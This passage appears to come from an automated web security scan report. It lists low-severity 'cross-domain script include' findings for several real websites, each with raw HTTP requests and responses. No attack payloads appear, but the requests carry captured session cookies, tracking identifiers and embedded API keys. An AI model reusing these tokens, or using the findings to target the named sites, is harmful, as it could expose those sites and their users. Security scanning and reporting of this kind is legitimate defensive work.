Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; .ASPXANONYMOUS=7JLoELl8zAEkAAAAOTI0OWQ2ZjEtNGRlYy00MjhjLWE2MzQtNjdjZWQ2MzA1NzQ2BAzHeg-AofAXSSoSDS0rsC5ORYQ1; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:19:25 GMT
Content-Length: 38723

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_selector" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln" content=
...[SNIP]...
<!-- http://Ads.msn.com/library/dapmsn.js --><script type="text/javascript" src="http://Ads.msn.com/library/dapmsn.js"></script>
...[SNIP]...

21.34. http://umfcluj.ro/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:02 GMT
Content-Length: 38701


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.35. http://umfcluj.ro/Detaliu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /Detaliu.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:36:38 GMT
Content-Length: 61593


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.36. http://umfcluj.ro/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:10 GMT
Content-Length: 60428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.37. http://umfcluj.ro/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /en

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=RezidentiatPrezentare
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:10 GMT
Content-Length: 38709


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.38. http://umfcluj.ro/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /fr

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /fr HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Medicina-Prezentare
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:28:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:28:16 GMT
Content-Length: 38338


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.39. http://umfcluj.ro/lista.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /lista.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lista.aspx?t=Admitere-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:09 GMT
Content-Length: 81440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.40. http://umfcluj.ro/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.aspx?caut=xss HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/contact.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:33 GMT
Content-Length: 35912


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/css/search.css" />
<script src="http://www.google.com/jsapi?key=ABQIAAAANZwfykwsHCjNL4gERaktPBSzWx17LJe0SsmJ8gqY9WfjG1R9hxTT4yq5qGTyi8mF0sc7JhLg1pVJGA" type="text/javascript"></script>
...[SNIP]...

21.41. http://umfcluj.ro/sitemap.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /sitemap.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sitemap.aspx HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:08 GMT
Content-Length: 104455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.42. http://www.adminitrack.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adminitrack.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?gclid=COjL1IrNjaoCFQ495QodxUaNzg HTTP/1.1
Host: www.adminitrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 14:20:31 GMT
Content-Length: 28976
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: AT=VISITOR=Y; expires=Wed, 18-Jul-2012 14:20:31 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
<div id="verisign">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.adminitrack.com&size=S&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="//VERIFY.AUTHORIZE.NET/anetseal/seal.js"></script>
...[SNIP]...

21.43. http://www.atlassian.com/en/resources/wac/js/globalNav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /en/resources/wac/js/globalNav.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/resources/wac/js/globalNav.js HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:30 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=1800, public
Expires: Tue, 19 Jul 2011 14:50:30 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 00:39:50 GMT
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 27343


AtlassianGlobalNav_en = function() {};
AtlassianGlobalNav_en.prototype = {
   create_ui: function() {
       if (jQuery("#atlassian-global-nav")) {
           var nav_div = jQuery("<div></div>").attr("id", "gl
...[SNIP]...
</div>").attr("id", "google_translate_element");
               google_translate_element.attr("style", "display:block;");
               jQuery("body").append(google_translate_element);
               var googleTranslate = jQuery("<script id='google_translate_script' src='http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit'></script>
...[SNIP]...

21.44. http://www.atlassian.com/software/jira/pricing.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /software/jira/pricing.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /software/jira/pricing.jsp HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSessionID=1148063633; CDLASTPAGEID=69200790; JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:21:23 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


<head>

<title>
Get Started For $10 - Pricing - JIRA
</
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.45. http://www.axosoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.axosoft.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.46. http://www.axosoft.com/lp/ga/bug-tracking-software/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.axosoft.com
Path:   /lp/ga/bug-tracking-software/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lp/ga/bug-tracking-software/?gclid=CNO474vNjaoCFYeD5QodMEA10A HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; _jsuid=2794942522048503467; is_returning=1; __utma=37276784.862101086.1311078323.1311078323.1311085183.2; __utmb=37276784.2.10.1311085183; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.47. http://www.axosoft.com/ontime  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.axosoft.com
Path:   /ontime

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ontime HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
Referer: http://www.axosoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; __utma=37276784.862101086.1311078323.1311078323.1311078323.1; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2794942522048503467; is_returning=1; _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.48. http://www.axosoft.com/ontime/bug_tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.axosoft.com
Path:   /ontime/bug_tracking

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ontime/bug_tracking HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
Referer: http://www.axosoft.com/ontime
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; _jsuid=2794942522048503467; __utma=37276784.862101086.1311078323.1311078323.1311085183.2; __utmb=37276784.1.10.1311085183; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
